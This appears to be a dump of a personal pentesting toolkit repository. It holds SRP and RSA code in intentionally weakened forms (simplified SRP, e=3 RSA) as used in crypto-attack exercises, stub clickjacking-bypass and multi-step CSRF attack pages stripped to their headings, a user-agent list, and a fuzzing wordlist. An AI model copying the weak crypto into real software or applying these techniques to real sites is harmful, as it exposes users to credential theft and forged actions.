v, salt = self.users[email]['v'], self.users[email]['salt'] 724 | this_private_key = raw_to_int(urandom(16)) % self.N 725 | this_public_key = self.k * v + modexp(self.g, this_private_key, self.N) 726 | u = raw_to_int(sha256(int_to_raw(client_public_key + this_public_key), raw=True)) 727 | shared_secret = modexp((client_public_key * modexp(v, u, self.N)), this_private_key, self.N) 728 | shared_key = sha256(int_to_raw(shared_secret), raw=True) 729 | self.users[email]['token'] = hmac(shared_key, salt, sha256) 730 | return salt, this_public_key 731 | 732 | def authenticate(self, email, token): 733 | return self.users[email]['token'] == token 734 | 735 | class SRPClient(): 736 | # Secure Remote Password (SRP) Client implementation 737 | 738 | def __init__(self, email, password, g=2, k=3, N=2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919 ): 739 | self.N = N 740 | self.g = g 741 | self.k = k 742 | self.email = email 743 | self.password = ascii_to_raw(password) 744 | self.private_key = raw_to_int(urandom(16)) % self.N 745 | self.public_key = modexp(self.g, self.private_key, self.N) 746 | 747 | def key_exchange(self, salt, server_public_key): 748 | u = raw_to_int(sha256(int_to_raw(self.public_key + server_public_key), raw=True)) 749 | x = raw_to_int(sha256(salt + self.password, raw=True)) 750 | shared_secret = modexp((server_public_key - self.k * modexp(self.g,x,self.N)), (self.private_key + u * x), self.N) 751 | shared_key = sha256(int_to_raw(shared_secret), raw=True) 752 | self.token = hmac(shared_key, salt, sha256) 753 | 754 | class SimplifiedSRPServer(SRPServer): 755 | def key_exchange(self, email, client_public_key): 756 | v, salt, u = self.users[email]['v'], self.users[email]['salt'], raw_to_int(urandom(16)) 757 | this_private_key = raw_to_int(urandom(16)) % self.N 758 | this_public_key = modexp(self.g, this_private_key, self.N) 759 | shared_secret = modexp(client_public_key * modexp(v, u, self.N), this_private_key, self.N) 760 | shared_key = sha256(int_to_raw(shared_secret), raw=True) 761 | self.users[email]['token'] = hmac(shared_key, salt, sha256) 762 | return salt, this_public_key, u 763 | 764 | class SimplifiedSRPClient(SRPClient): 765 | def key_exchange(self, salt, server_public_key, u): 766 | x = raw_to_int(sha256(salt + self.password, raw=True)) 767 | shared_secret = modexp(server_public_key, self.private_key + (u * x), self.N) 768 | shared_key = sha256(int_to_raw(shared_secret), raw=True) 769 | self.token = hmac(shared_key, salt, sha256) 770 | 771 | class RSA(): 772 | def __init__(self): 773 | e = 3 774 | while True: 775 | p = primegen(1024) 776 | q = primegen(1024) 777 | n = p*q 778 | try: 779 | d = modinv(e, (p-1)*(q-1)) 780 | break 781 | except Exception: 782 | pass 783 | self.public_key = e 784 | self.private_key = d 785 | self.n = n 786 | 787 | def rsaencrypt(msg, e, n): 788 | if not isinstance(msg, int): 789 | msg = raw_to_int(ascii_to_raw(msg)) 790 | return modexp(msg, e, n) 791 | 792 | def rsadecrypt(cpt, d, n): 793 | return int_to_raw(modexp(cpt, d, n)) 794 | ``` -------------------------------------------------------------------------------- /web/README.md: -------------------------------------------------------------------------------- 1 | ## User-Agents 2 | 3 | * IE6 4 | * Mozilla/5.0 (Windows; U; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) 5 | * IE7 6 | * Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) 7 | *IE11 8 | * Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko -------------------------------------------------------------------------------- /web/burpsuite_free_v1.6.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vergl4s/pentesting-dump/fea85de7d6ac3edf4c5a965b2e4e95f7689fd22f/web/burpsuite_free_v1.6.jar -------------------------------------------------------------------------------- /web/clickjacking_bypass.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Vulnerable application loaded within an iframe

4 | 5 | 6 |

Double framing?

7 | 9 | 10 | 11 |

onBeforeUnload

12 | 18 | 20 | 21 | 22 | 23 |

No-Content Flushing

24 | 34 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /web/clickjacking_outter_frame.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /web/csrf.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |

Multi-step CSRF attack.

4 |

Post request is made for each one of the forms, with target being NstFrame.

5 | 6 | 7 | 8 | 9 |
11 | 12 |
13 | 14 |
16 | 17 |
18 | 19 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /wordlists/python-keywords.txt: -------------------------------------------------------------------------------- 1 | False 2 | class 3 | finally 4 | is 5 | return 6 | None 7 | continue 8 | for 9 | lambda 10 | try 11 | True 12 | def 13 | from 14 | nonlocal 15 | while 16 | and 17 | del 18 | global 19 | not 20 | with 21 | as 22 | elif 23 | if 24 | or 25 | yield 26 | assert 27 | else 28 | import 29 | pass 30 | break 31 | except 32 | in 33 | raise 34 | __future__ 35 | __main__ 36 | _dummy_thread 37 | _thread 38 | abc 39 | aifc 40 | argparse 41 | array 42 | ast 43 | asynchat 44 | asyncio 45 | asyncore 46 | atexit 47 | audioop 48 | base64 49 | bdb 50 | binascii 51 | binhex 52 | bisect 53 | builtins 54 | bz2 55 | calendar 56 | cgi 57 | cgitb 58 | chunk 59 | cmath 60 | cmd 61 | code 62 | codecs 63 | codeop 64 | collections.abc 65 | colorsys 66 | compileall 67 | concurrent.futures 68 | configparser 69 | contextlib 70 | copy 71 | copyreg 72 | cProfile 73 | crypt 74 | csv 75 | ctypes 76 | curses.ascii 77 | curses.panel 78 | curses.textpad 79 | datetime 80 | dbm.dumb 81 | dbm.gnu 82 | dbm.ndbm 83 | decimal 84 | difflib 85 | dis 86 | distutils.archive_util 87 | distutils.bcppcompiler 88 | distutils.ccompiler 89 | distutils.cmd 90 | distutils.command 91 | distutils.command.bdist 92 | distutils.command.bdist_dumb 93 | distutils.command.bdist_msi 94 | distutils.command.bdist_packager 95 | distutils.command.bdist_rpm 96 | distutils.command.bdist_wininst 97 | distutils.command.build 98 | distutils.command.build_clib 99 | distutils.command.build_ext 100 | distutils.command.build_py 101 | distutils.command.build_scripts 102 | distutils.command.check 103 | distutils.command.clean 104 | distutils.command.config 105 | distutils.command.install 106 | distutils.command.install_data 107 | distutils.command.install_headers 108 | distutils.command.install_lib 109 | distutils.command.install_scripts 110 | distutils.command.register 111 | distutils.command.sdist 112 | distutils.core 113 | distutils.cygwinccompiler 114 | distutils.debug 115 | distutils.dep_util 116 | distutils.dir_util 117 | distutils.dist 118 | distutils.errors 119 | distutils.extension 120 | distutils.fancy_getopt 121 | distutils.file_util 122 | distutils.filelist 123 | distutils.log 124 | distutils.msvccompiler 125 | distutils.spawn 126 | distutils.sysconfig 127 | distutils.text_file 128 | distutils.unixccompiler 129 | distutils.util 130 | distutils.version 131 | doctest 132 | dummy_threading 133 | email.charset 134 | email.contentmanager 135 | email.encoders 136 | email.errors 137 | email.generator 138 | email.header 139 | email.headerregistry 140 | email.iterators 141 | email.message 142 | email.mime 143 | email.parser 144 | email.policy 145 | email.utils 146 | encodings.idna 147 | encodings.mbcs 148 | encodings.utf_8_sig 149 | ensurepip 150 | enum 151 | errno 152 | faulthandler 153 | fcntl 154 | filecmp 155 | fileinput 156 | fnmatch 157 | formatter 158 | fpectl 159 | fractions 160 | ftplib 161 | functools 162 | gc 163 | getopt 164 | getpass 165 | gettext 166 | glob 167 | grp 168 | gzip 169 | hashlib 170 | heapq 171 | hmac 172 | html.entities 173 | html.parser 174 | http.client 175 | http.cookiejar 176 | http.cookies 177 | http.server 178 | imaplib 179 | imghdr 180 | imp 181 | importlib.abc 182 | importlib.machinery 183 | importlib.util 184 | inspect 185 | io 186 | ipaddress 187 | itertools 188 | json.tool 189 | keyword 190 | lib2to3 191 | linecache 192 | locale 193 | logging.config 194 | logging.handlers 195 | lzma 196 | macpath 197 | mailbox 198 | mailcap 199 | marshal 200 | math 201 | mimetypes 202 | mmap 203 | modulefinder 204 | msilib 205 | msvcrt 206 | multiprocessing.connection 207 | multiprocessing.dummy 208 | multiprocessing.managers 209 | multiprocessing.pool 210 | multiprocessing.sharedctypes 211 | netrc 212 | nis 213 | nntplib 214 | numbers 215 | operator 216 | optparse 217 | os.path 218 | ossaudiodev 219 | parser 220 | pathlib 221 | pdb 222 | pickle 223 | pickletools 224 | pipes 225 | pkgutil 226 | platform 227 | plistlib 228 | poplib 229 | posix 230 | pprint 231 | profile 232 | pstats 233 | pty 234 | pwd 235 | py_compile 236 | pyclbr 237 | pydoc 238 | queue 239 | quopri 240 | random 241 | re 242 | readline 243 | reprlib 244 | resource 245 | rlcompleter 246 | runpy 247 | sched 248 | select 249 | selectors 250 | shelve 251 | shlex 252 | shutil 253 | signal 254 | site 255 | smtpd 256 | smtplib 257 | sndhdr 258 | socket 259 | socketserver 260 | spwd 261 | sqlite3 262 | ssl 263 | stat 264 | statistics 265 | string 266 | stringprep 267 | struct 268 | subprocess 269 | sunau 270 | symbol 271 | symtable 272 | sys 273 | sysconfig 274 | syslog 275 | tabnanny 276 | tarfile 277 | telnetlib 278 | tempfile 279 | termios 280 | test.support 281 | textwrap 282 | threading 283 | time 284 | timeit 285 | tkinter.scrolledtext 286 | tkinter.tix 287 | tkinter.ttk 288 | token 289 | tokenize 290 | trace 291 | traceback 292 | tracemalloc 293 | tty 294 | turtle 295 | turtledemo 296 | types 297 | typing 298 | unicodedata 299 | unittest.mock 300 | urllib.error 301 | urllib.parse 302 | urllib.request 303 | urllib.response 304 | urllib.robotparser 305 | uu 306 | uuid 307 | venv 308 | warnings 309 | wave 310 | weakref 311 | webbrowser 312 | winreg 313 | winsound 314 | wsgiref.handlers 315 | wsgiref.headers 316 | wsgiref.simple_server 317 | wsgiref.util 318 | wsgiref.validate 319 | xdrlib 320 | xml.dom 321 | xml.dom.minidom 322 | xml.dom.pulldom 323 | xml.etree.ElementTree 324 | xml.parsers.expat 325 | xml.parsers.expat.errors 326 | xml.parsers.expat.model 327 | xml.sax 328 | xml.sax.handler 329 | xml.sax.saxutils 330 | xml.sax.xmlreader 331 | xmlrpc.client 332 | xmlrpc.server 333 | zipapp 334 | zipfile 335 | zipimport 336 | zlib 337 | CLD_CONTINUED 338 | CLD_DUMPED 339 | CLD_EXITED 340 | CLD_TRAPPED 341 | EX_CANTCREAT 342 | EX_CONFIG 343 | EX_DATAERR 344 | EX_IOERR 345 | EX_NOHOST 346 | EX_NOINPUT 347 | EX_NOPERM 348 | EX_NOUSER 349 | EX_OK 350 | EX_OSERR 351 | EX_OSFILE 352 | EX_PROTOCOL 353 | EX_SOFTWARE 354 | EX_TEMPFAIL 355 | EX_UNAVAILABLE 356 | EX_USAGE 357 | F_LOCK 358 | F_OK 359 | F_TEST 360 | F_TLOCK 361 | F_ULOCK 362 | MutableMapping 363 | NGROUPS_MAX 364 | O_ACCMODE 365 | O_APPEND 366 | O_ASYNC 367 | O_CLOEXEC 368 | O_CREAT 369 | O_DIRECT 370 | O_DIRECTORY 371 | O_DSYNC 372 | O_EXCL 373 | O_LARGEFILE 374 | O_NDELAY 375 | O_NOATIME 376 | O_NOCTTY 377 | O_NOFOLLOW 378 | O_NONBLOCK 379 | O_PATH 380 | O_RDONLY 381 | O_RDWR 382 | O_RSYNC 383 | O_SYNC 384 | O_TMPFILE 385 | O_TRUNC 386 | O_WRONLY 387 | POSIX_FADV_DONTNEED 388 | POSIX_FADV_NOREUSE 389 | POSIX_FADV_NORMAL 390 | POSIX_FADV_RANDOM 391 | POSIX_FADV_SEQUENTIAL 392 | POSIX_FADV_WILLNEED 393 | PRIO_PGRP 394 | PRIO_PROCESS 395 | PRIO_USER 396 | P_ALL 397 | P_NOWAIT 398 | P_NOWAITO 399 | P_PGID 400 | P_PID 401 | P_WAIT 402 | RTLD_DEEPBIND 403 | RTLD_GLOBAL 404 | RTLD_LAZY 405 | RTLD_LOCAL 406 | RTLD_NODELETE 407 | RTLD_NOLOAD 408 | RTLD_NOW 409 | R_OK 410 | SCHED_BATCH 411 | SCHED_FIFO 412 | SCHED_IDLE 413 | SCHED_OTHER 414 | SCHED_RESET_ON_FORK 415 | SCHED_RR 416 | SEEK_CUR 417 | SEEK_DATA 418 | SEEK_END 419 | SEEK_HOLE 420 | SEEK_SET 421 | ST_APPEND 422 | ST_MANDLOCK 423 | ST_NOATIME 424 | ST_NODEV 425 | ST_NODIRATIME 426 | ST_NOEXEC 427 | ST_NOSUID 428 | ST_RDONLY 429 | ST_RELATIME 430 | ST_SYNCHRONOUS 431 | ST_WRITE 432 | TMP_MAX 433 | WCONTINUED 434 | WCOREDUMP 435 | WEXITED 436 | WEXITSTATUS 437 | WIFCONTINUED 438 | WIFEXITED 439 | WIFSIGNALED 440 | WIFSTOPPED 441 | WNOHANG 442 | WNOWAIT 443 | WSTOPPED 444 | WSTOPSIG 445 | WTERMSIG 446 | WUNTRACED 447 | W_OK 448 | XATTR_CREATE 449 | XATTR_REPLACE 450 | XATTR_SIZE_MAX 451 | X_OK 452 | _DummyDirEntry 453 | _Environ 454 | __all__ 455 | __builtins__ 456 | __cached__ 457 | __doc__ 458 | __file__ 459 | __loader__ 460 | __name__ 461 | __package__ 462 | __spec__ 463 | _dummy_scandir 464 | _execvpe 465 | _exists 466 | _exit 467 | _fwalk 468 | _get_exports_list 469 | _putenv 470 | _spawnvef 471 | _unsetenv 472 | _wrap_close 473 | abort 474 | access 475 | altsep 476 | chdir 477 | chmod 478 | chown 479 | chroot 480 | close 481 | closerange 482 | confstr 483 | confstr_names 484 | cpu_count 485 | ctermid 486 | curdir 487 | defpath 488 | device_encoding 489 | devnull 490 | dup 491 | dup2 492 | environ 493 | environb 494 | errno 495 | error 496 | execl 497 | execle 498 | execlp 499 | execlpe 500 | execv 501 | execve 502 | execvp 503 | execvpe 504 | extsep 505 | fchdir 506 | fchmod 507 | fchown 508 | fdatasync 509 | fdopen 510 | fork 511 | forkpty 512 | fpathconf 513 | fsdecode 514 | fsencode 515 | fstat 516 | fstatvfs 517 | fsync 518 | ftruncate 519 | fwalk 520 | get_blocking 521 | get_exec_path 522 | get_inheritable 523 | get_terminal_size 524 | getcwd 525 | getcwdb 526 | getegid 527 | getenv 528 | getenvb 529 | geteuid 530 | getgid 531 | getgrouplist 532 | getgroups 533 | getloadavg 534 | getlogin 535 | getpgid 536 | getpgrp 537 | getpid 538 | getppid 539 | getpriority 540 | getresgid 541 | getresuid 542 | getsid 543 | getuid 544 | getxattr 545 | initgroups 546 | isatty 547 | kill 548 | killpg 549 | lchown 550 | linesep 551 | link 552 | listdir 553 | listxattr 554 | lockf 555 | lseek 556 | lstat 557 | major 558 | makedev 559 | makedirs 560 | minor 561 | mkdir 562 | mkfifo 563 | mknod 564 | name 565 | nice 566 | open 567 | openpty 568 | pardir 569 | path 570 | pathconf 571 | pathconf_names 572 | pathsep 573 | pipe 574 | pipe2 575 | popen 576 | posix_fadvise 577 | posix_fallocate 578 | pread 579 | putenv 580 | pwrite 581 | read 582 | readlink 583 | readv 584 | remove 585 | removedirs 586 | removexattr 587 | rename 588 | renames 589 | replace 590 | rmdir 591 | scandir 592 | sched_get_priority_max 593 | sched_get_priority_min 594 | sched_getaffinity 595 | sched_getparam 596 | sched_getscheduler 597 | sched_param 598 | sched_rr_get_interval 599 | sched_setaffinity 600 | sched_setparam 601 | sched_setscheduler 602 | sched_yield 603 | sendfile 604 | sep 605 | set_blocking 606 | set_inheritable 607 | setegid 608 | seteuid 609 | setgid 610 | setgroups 611 | setpgid 612 | setpgrp 613 | setpriority 614 | setregid 615 | setresgid 616 | setresuid 617 | setreuid 618 | setsid 619 | setuid 620 | setxattr 621 | spawnl 622 | spawnle 623 | spawnlp 624 | spawnlpe 625 | spawnv 626 | spawnve 627 | spawnvp 628 | spawnvpe 629 | st 630 | stat 631 | stat_float_times 632 | stat_result 633 | statvfs 634 | statvfs_result 635 | strerror 636 | supports_bytes_environ 637 | supports_dir_fd 638 | supports_effective_ids 639 | supports_fd 640 | supports_follow_symlinks 641 | symlink 642 | sync 643 | sys 644 | sysconf 645 | sysconf_names 646 | system 647 | tcgetpgrp 648 | tcsetpgrp 649 | terminal_size 650 | times 651 | times_result 652 | truncate 653 | ttyname 654 | umask 655 | uname 656 | uname_result 657 | unlink 658 | unsetenv 659 | urandom 660 | utime 661 | wait 662 | wait3 663 | wait4 664 | waitid 665 | waitid_result 666 | waitpid 667 | walk 668 | write 669 | writev 670 | __displayhook__ 671 | __doc__ 672 | __excepthook__ 673 | __interactivehook__ 674 | __loader__ 675 | __name__ 676 | __package__ 677 | __spec__ 678 | __stderr__ 679 | __stdin__ 680 | __stdout__ 681 | _clear_type_cache 682 | _current_frames 683 | _debugmallocstats 684 | _getframe 685 | _home 686 | _mercurial 687 | _xoptions 688 | abiflags 689 | api_version 690 | argv 691 | base_exec_prefix 692 | base_prefix 693 | builtin_module_names 694 | byteorder 695 | call_tracing 696 | callstats 697 | copyright 698 | displayhook 699 | dont_write_bytecode 700 | exc_info 701 | excepthook 702 | exec_prefix 703 | executable 704 | exit 705 | flags 706 | float_info 707 | float_repr_style 708 | get_coroutine_wrapper 709 | getallocatedblocks 710 | getcheckinterval 711 | getdefaultencoding 712 | getdlopenflags 713 | getfilesystemencoding 714 | getprofile 715 | getrecursionlimit 716 | getrefcount 717 | getsizeof 718 | getswitchinterval 719 | gettrace 720 | hash_info 721 | hexversion 722 | implementation 723 | int_info 724 | intern 725 | is_finalizing 726 | last_traceback 727 | last_type 728 | last_value 729 | maxsize 730 | maxunicode 731 | meta_path 732 | modules 733 | path 734 | path_hooks 735 | path_importer_cache 736 | platform 737 | prefix 738 | ps1 739 | ps2 740 | ps3 741 | set_coroutine_wrapper 742 | setcheckinterval 743 | setdlopenflags 744 | setprofile 745 | setrecursionlimit 746 | setswitchinterval 747 | settrace 748 | stderr 749 | stdin 750 | stdout 751 | thread_info 752 | version 753 | version_info 754 | warnoptions0 755 | dumps 756 | loads --------------------------------------------------------------------------------